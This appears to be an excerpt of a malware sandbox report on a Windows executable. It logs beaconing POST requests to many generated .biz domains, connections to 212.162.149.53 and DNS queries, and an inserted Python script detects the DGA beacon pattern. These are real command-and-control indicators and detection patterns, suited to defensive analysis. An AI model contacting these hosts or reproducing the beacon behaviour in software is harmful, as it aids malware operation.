                        Source: global trafficHTTP traffic detected: POST /cgfpu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /kfabynhosjjh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /wcjgm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /uayanvrydqdv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /nuxw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /qunybk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /gu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /vne HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /v HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /mshapsve HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /roupupjil HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /pbcmr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /megjwol HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /usismcqqdljny HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /xjfegb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /ls HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /gyyihnqs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /obphwwtyxwxyphq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /olsalbtppedg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /bwancadkaqtlbx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /fanvkuxv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /ix HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /vxsjaatihrjtd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /qvkbehfy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /rujiughdxo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /bhfem HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /qlckdyepimpj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /ityan HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /mfjpaqkdwglsvxqo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /qowwyqvurlxrxabk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /tdrxmaergnh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /afeeapyp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /obhmtmpkhrufyuif HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /rwhorjnmac HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /rgh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /ovwvug HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /tgeilwrmlsau HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global traffic | HTTP traffic detected: 59 POST requests. Every one carries the same headers, Cache-Control: no-cache, Connection: Keep-Alive, Pragma: no-cache and User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400, so only the request line, Host and Content-Length of each request are listed below:
                        POST /snkuws HTTP/1.1 | Host: jwkoeoqns.biz | Content-Length: 778
                        POST /x HTTP/1.1 | Host: mgmsclkyu.biz | Content-Length: 828
                        POST /hchtqxq HTTP/1.1 | Host: xccjj.biz | Content-Length: 778
                        POST /cf HTTP/1.1 | Host: warkcdu.biz | Content-Length: 828
                        POST /qirtwake HTTP/1.1 | Host: hehckyov.biz | Content-Length: 778
                        POST /lveagfnoqbuq HTTP/1.1 | Host: gcedd.biz | Content-Length: 828
                        POST /rsstpsksfhdhf HTTP/1.1 | Host: rynmcq.biz | Content-Length: 778
                        POST /knaxcyr HTTP/1.1 | Host: jwkoeoqns.biz | Content-Length: 828
                        POST /ivdmudcsfvhy HTTP/1.1 | Host: xccjj.biz | Content-Length: 828
                        POST /ydpeotimwcfnew HTTP/1.1 | Host: uaafd.biz | Content-Length: 778
                        POST /tssrdd HTTP/1.1 | Host: hehckyov.biz | Content-Length: 828
                        POST /nhvixgstciqyn HTTP/1.1 | Host: eufxebus.biz | Content-Length: 778
                        POST /lameuyxyl HTTP/1.1 | Host: rynmcq.biz | Content-Length: 828
                        POST /qcgjfxceqsgou HTTP/1.1 | Host: uaafd.biz | Content-Length: 828
                        POST /tfuhaffhj HTTP/1.1 | Host: pwlqfu.biz | Content-Length: 778
                        POST /fx HTTP/1.1 | Host: eufxebus.biz | Content-Length: 828
                        POST /tmdyfv HTTP/1.1 | Host: rrqafepng.biz | Content-Length: 778
                        POST /yk HTTP/1.1 | Host: pwlqfu.biz | Content-Length: 828
                        POST /fmrmh HTTP/1.1 | Host: rrqafepng.biz | Content-Length: 828
                        POST /cngo HTTP/1.1 | Host: ctdtgwag.biz | Content-Length: 778
                        POST /wikoehfueo HTTP/1.1 | Host: ctdtgwag.biz | Content-Length: 828
                        POST /iih HTTP/1.1 | Host: tnevuluw.biz | Content-Length: 778
                        POST /kykfeohkixf HTTP/1.1 | Host: tnevuluw.biz | Content-Length: 828
                        POST /ybxut HTTP/1.1 | Host: whjovd.biz | Content-Length: 828
                        POST /yadhctxanlnpjhwu HTTP/1.1 | Host: whjovd.biz | Content-Length: 778
                        POST /aloksmnh HTTP/1.1 | Host: gjogvvpsf.biz | Content-Length: 828
                        POST /i HTTP/1.1 | Host: gjogvvpsf.biz | Content-Length: 828
                        POST /xflcwjjwcbmi HTTP/1.1 | Host: gjogvvpsf.biz | Content-Length: 778
                        POST /xnjeybrqhb HTTP/1.1 | Host: reczwga.biz | Content-Length: 828
                        POST /sbplnevnaxjj HTTP/1.1 | Host: gjogvvpsf.biz | Content-Length: 778
                        POST /qtclvagsdhvow HTTP/1.1 | Host: bghjpy.biz | Content-Length: 828
                        POST /snxddmvolovsghk HTTP/1.1 | Host: reczwga.biz | Content-Length: 778
                        POST /glquerlqdouqshy HTTP/1.1 | Host: damcprvgv.biz | Content-Length: 828
                        POST /vnho HTTP/1.1 | Host: bghjpy.biz | Content-Length: 778
                        POST /ow HTTP/1.1 | Host: ocsvqjg.biz | Content-Length: 828
                        POST /hbbreaeoihjkosw HTTP/1.1 | Host: damcprvgv.biz | Content-Length: 778
                        POST /kaok HTTP/1.1 | Host: ywffr.biz | Content-Length: 828
                        POST /gcbuytwgypg HTTP/1.1 | Host: ecxbwt.biz | Content-Length: 828
                        POST /cm HTTP/1.1 | Host: ocsvqjg.biz | Content-Length: 778
                        POST /iuaudncacnnpxx HTTP/1.1 | Host: pectx.biz | Content-Length: 828
                        POST /biwgwfhxqj HTTP/1.1 | Host: ywffr.biz | Content-Length: 778
                        POST /dgclnsuj HTTP/1.1 | Host: zyiexezl.biz | Content-Length: 828
                        POST /ra HTTP/1.1 | Host: ecxbwt.biz | Content-Length: 778
                        POST /hmfdteob HTTP/1.1 | Host: banwyw.biz | Content-Length: 828
                        POST /roaragruci HTTP/1.1 | Host: wxgzshna.biz | Content-Length: 828
                        POST /opniaqqvrov HTTP/1.1 | Host: pectx.biz | Content-Length: 778
                        POST /wtuuhs HTTP/1.1 | Host: wxgzshna.biz | Content-Length: 828
                        POST /rylns HTTP/1.1 | Host: zrlssa.biz | Content-Length: 828
                        POST /sylvrey HTTP/1.1 | Host: zyiexezl.biz | Content-Length: 778
                        POST /tnh HTTP/1.1 | Host: jlqltsjvh.biz | Content-Length: 828
                        POST /rubmfur HTTP/1.1 | Host: banwyw.biz | Content-Length: 778
                        POST /nuqh HTTP/1.1 | Host: wxgzshna.biz | Content-Length: 778
                        POST /htjvvioxxlhqon HTTP/1.1 | Host: xyrgy.biz | Content-Length: 828
                        POST /ntodprrygrgkdvw HTTP/1.1 | Host: htwqzczce.biz | Content-Length: 828
                        POST /jrquah HTTP/1.1 | Host: wxgzshna.biz | Content-Length: 778
                        POST /clnuatvxfq HTTP/1.1 | Host: htwqzczce.biz | Content-Length: 828
                        POST /q HTTP/1.1 | Host: zrlssa.biz | Content-Length: 778
                        POST /ylrygkaugqlhb HTTP/1.1 | Host: kvbjaur.biz | Content-Length: 828
                        POST /jpqeq HTTP/1.1 | Host: uphca.biz | Content-Length: 828
                        Source: unknown | TCP traffic detected without corresponding DNS query: 212.162.149.53 (this finding is repeated 50 times in the report, one entry per connection)
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe | Code function: 0_2_0044289D InternetQueryDataAvailable,InternetReadFile | 0_2_0044289D
                        Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive
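The following Python is an added example, not code from the Joe Sandbox report or from the sample itself. It parses report entries in the flattened one-line form used above and flags the beaconing shape they show: a single fixed User-Agent POSTing short lowercase paths to many distinct .biz hosts with request bodies of only two sizes (778 and 828 bytes), while the api.ipify.org GET with a different User-Agent is left alone. The sample entries are constructed by copying six of the POST requests and the GET request listed above; the thresholds (five distinct hosts, at most two body sizes, consonant-run and vowel-ratio cutoffs for the lexical check) are assumptions chosen for this example, not values taken from the report.

```python
import re
from collections import defaultdict

# User-Agent string shared by every POST in the report above.
BEACON_UA = ("Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
             "Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI "
             "WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400")


def _post(path, host, length):
    # Rebuilds one report entry exactly as the report prints it: the request
    # line and every header run together with no separator.
    return ("Source: global trafficHTTP traffic detected: POST " + path + " HTTP/1.1"
            + "Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: " + host
            + "User-Agent: " + BEACON_UA + "Content-Length: " + str(length))


# Constructed sample input: entries copied from the report above.
SAMPLE_LINES = [
    _post("/snkuws", "jwkoeoqns.biz", 778),
    _post("/x", "mgmsclkyu.biz", 828),
    _post("/hchtqxq", "xccjj.biz", 778),
    _post("/cf", "warkcdu.biz", 828),
    _post("/qirtwake", "hehckyov.biz", 778),
    _post("/knaxcyr", "jwkoeoqns.biz", 828),
    "Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 "
    "(Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0"
    "Host: api.ipify.orgConnection: Keep-Alive",
]

PREFIX = "HTTP traffic detected: "
HEADER_NAMES = ("Cache-Control", "Connection", "Pragma", "Host", "User-Agent", "Content-Length")
# Zero-width split in front of each known header name, since the report
# dropped the line breaks between headers.
HEADER_SPLIT = re.compile(r"(?=(?:%s): )" % "|".join(HEADER_NAMES))
REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<path>\S+) HTTP/1\.[01]$")
VOWELS = set("aeiou")


def parse_report_line(line):
    """Split one flattened report entry into method, path and a header dict."""
    if PREFIX not in line:
        return None
    body = line.split(PREFIX, 1)[1]
    parts = HEADER_SPLIT.split(body)
    m = REQUEST_LINE.match(parts[0])
    if not m:
        return None
    headers = {}
    for chunk in parts[1:]:
        name, _, value = chunk.partition(": ")
        headers[name] = value
    return {"method": m["method"], "path": m["path"], "headers": headers}


def label_features(label):
    """Longest consonant run and vowel ratio of one hostname label."""
    longest = run = 0
    for ch in label:
        run = 0 if ch in VOWELS else run + 1
        longest = max(longest, run)
    ratio = sum(ch in VOWELS for ch in label) / max(len(label), 1)
    return longest, ratio


def registrable_label(host):
    parts = host.lower().split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def looks_generated(host):
    """Cheap lexical DGA check. Assumed cutoffs: four consonants in a row or
    fewer than 30% vowels is unusual for a name a human chose."""
    longest, ratio = label_features(registrable_label(host))
    return longest >= 4 or ratio < 0.3


def find_beaconing(requests, min_hosts=5, max_sizes=2):
    """Flag a User-Agent that only ever POSTs bare lowercase paths to many
    distinct hosts with (almost) constant body sizes: the shape of a DGA beacon."""
    by_ua = defaultdict(list)
    for r in requests:
        by_ua[r["headers"].get("User-Agent", "")].append(r)
    findings = []
    for ua, reqs in by_ua.items():
        hosts = {r["headers"].get("Host", "") for r in reqs}
        sizes = {r["headers"].get("Content-Length") for r in reqs} - {None}
        bare_posts = [r for r in reqs
                      if r["method"] == "POST" and re.fullmatch(r"/[a-z]{1,20}", r["path"])]
        if len(hosts) >= min_hosts and len(bare_posts) == len(reqs) and len(sizes) <= max_sizes:
            findings.append({
                "user_agent": ua,
                "hosts": sorted(hosts),
                "lexically_random_hosts": sorted(h for h in hosts if looks_generated(h)),
                "content_lengths": sorted(sizes),
            })
    return findings


def analyze(lines):
    """Parse report lines and return the beaconing findings."""
    requests = [r for r in map(parse_report_line, lines) if r]
    return find_beaconing(requests)


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LINES):
        print(finding)
```

The lexical check on its own is not reliable: it marks mgmsclkyu.biz, xccjj.biz, warkcdu.biz and hehckyov.biz but passes jwkoeoqns.biz, which is why the group-level rule keys on the invariant User-Agent and the near-constant Content-Length instead of on the names. Those two values, the WindowsWechat/QQBrowser User-Agent string and bodies of exactly 778 or 828 bytes, are also the cheapest pivots for a proxy-log hunt across the rest of the estate.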
                        Source: global traffic | DNS traffic detected: DNS query: api.ipify.org
                        Source: global traffic | DNS traffic detected: DNS query: pywolwnvd.biz
                        Source: global traffic | DNS traffic detected: DNS query: ssbzmoy.biz
                        Source: global traffic | DNS traffic detected: DNS query: cvgrf.biz
                        Source: global traffic | DNS traffic detected: DNS query: s82.gocheapweb.com
                        Source: global traffic | DNS traffic detected: DNS query: npukfztj.biz
                        Source: global traffic | DNS traffic detected: DNS query: przvgke.biz
                        Source: global traffic | DNS traffic detected: DNS query: zlenh.biz
                        Source: global traffic | DNS traffic detected: DNS query: knjghuig.biz
                        Source: global traffic | DNS traffic detected: DNS query: uhxqin.biz
                        Source: global traffic | DNS traffic detected: DNS query: anpmnmxo.biz
                        Source: global traffic | DNS traffic detected: DNS query: lpuegx.biz
                        Source: global traffic | DNS traffic detected: DNS query: vjaxhpbji.biz
                        Source: global traffic | DNS traffic detected: DNS query: xlfhhhm.biz
                        Source: global traffic | DNS traffic detected: DNS query: ifsaia.biz
                        Source: global traffic | DNS traffic detected: DNS query: saytjshyf.biz
                        Source: global traffic | DNS traffic detected: DNS query: vcddkls.biz
                        Source: global traffic | DNS traffic detected: DNS query: fwiwk.biz
                        Source: global traffic | DNS traffic detected: DNS query: tbjrpv.biz
                        Source: global traffic | DNS traffic detected: DNS query: deoci.biz
                        Source: global traffic | DNS traffic detected: DNS query: gytujflc.biz
                        Source: global traffic | DNS traffic detected: DNS query: qaynky.biz
                        Source: global traffic | DNS traffic detected: DNS query: bumxkqgxu.biz
                        Source: global traffic | DNS traffic detected: DNS query: dwrqljrr.biz
                        Source: global traffic | DNS traffic detected: DNS query: nqwjmb.biz
                        Source: global traffic | DNS traffic detected: DNS query: ytctnunms.biz
                        Source: global traffic | DNS traffic detected: DNS query: myups.biz
                        Source: global traffic | DNS traffic detected: DNS query: oshhkdluh.biz
                        Source: global traffic | DNS traffic detected: DNS query: yunalwv.biz
                        Source: global traffic | DNS traffic detected: DNS query: jpskm.biz
                        Source: global traffic | DNS traffic detected: DNS query: lrxdmhrr.biz
                        Source: global traffic | DNS traffic detected: DNS query: wllvnzb.biz
                        Source: global traffic | DNS traffic detected: DNS query: gnqgo.biz
                        Source: global traffic | DNS traffic detected: DNS query: jhvzpcfg.biz
                        Source: global traffic | DNS traffic detected: DNS query: acwjcqqv.biz
                        Source: global traffic | DNS traffic detected: DNS query: lejtdj.biz
                        Source: global traffic | DNS traffic detected: DNS query: vyome.biz
